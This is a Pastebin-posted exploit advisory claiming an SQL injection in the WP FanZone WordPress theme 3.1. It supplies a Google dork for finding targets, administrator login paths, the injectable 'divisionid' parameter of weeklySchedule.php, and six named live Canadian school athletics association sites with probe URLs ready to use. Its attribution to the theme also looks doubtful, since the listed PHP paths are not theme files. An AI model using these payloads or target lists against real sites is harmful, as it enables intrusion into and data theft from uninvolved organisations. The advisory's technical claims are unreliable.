Advertisement
Guest User

Untitled

a guest
Jan 28th, 2020
547
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.45 KB | None | 0 0
  1. # Exploit Title : Built with WordPress and WP FanZone Themes 3.1 SQL Injection
  2. # Author [ Discovered By ] : KingSkrupellos
  3. # Team : Cyberizm Digital Security Army
  4. # Date : 21/01/2020
  5. # Vendor Homepage : wordpress.org - wpdevshed.com/wp-fanzone-theme/
  6. # Software Download Link : downloads.wordpress.org/theme/wp-fanzone.3.1.zip
  7. # Software Version : 3.1
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dork : Built with WordPress and WP FanZone site:ca
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  16. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  17.  
  18. ###################################################################
  19.  
  20. # Description About Software :
  21. ****************************
  22. WP Fan Zone was designed orginally with sports fans and bloggers in mind,
  23. but it could easily be used for any type of blog or magazine style site that wants to
  24. feature images and content. It is fully responsive, comes with two main menus, and
  25. widget areas for all page types. It also has customization options for social media
  26. links, color scheme and author bios, plus a simple banner widget for putting ads in the header.
  27.  
  28. ###################################################################
  29.  
  30. # Impact :
  31. ***********
  32. Built with WordPress and WP FanZone 3.1 is prone to an SQL-injection vulnerability because
  33. it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  34. Exploiting this issue could allow an attacker to compromise the application, access or
  35. modify data, or exploit latent vulnerabilities in the underlying database.
  36. A remote attacker can send a specially crafted request to the vulnerable application and
  37. execute arbitrary SQL commands in application`s database. Further exploitation of this
  38. vulnerability may result in unauthorized data manipulation.
  39. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  40.  
  41. ###################################################################
  42.  
  43. # Administrator Login Path :
  44. ***************************
  45. /admin/adminLogin.php
  46. /admin/convenorLogin.php
  47. /admin/coachLogin.php
  48. /index.php/department-heads/
  49. /wp-login.php
  50.  
  51. # SQL Injection Exploit :
  52. **********************
  53. /weeklySchedule.php?schoolid=[ID-NUMBER]&date=ALL&leagueid=[ID-NUMBER]&divisionid=[SQL Injection]
  54.  
  55. ###################################################################
  56.  
  57. # Example Vulnerable Sites :
  58. *************************
  59. LOSSA – Lake Ontario Secondary School Athletics
  60.  
  61. [+] lossa.on.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27
  62.  
  63. LKSSAA – Lambton Kent Secondary School Athletic Association
  64.  
  65. [+] lkssaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27
  66.  
  67. Sudbury District Secondary Schools' Athletic Association
  68.  
  69. [+] sdssaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27
  70.  
  71. BCSSAA – Brant County Secondary Schools' Athletic Association
  72.  
  73. [+] bcssaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27
  74.  
  75. Huron Perth Athletic Association
  76.  
  77. [+] hpathletics.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27
  78.  
  79. NRHSAA – Niagara Region High School Athletic Association
  80.  
  81. [+] nrhsaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement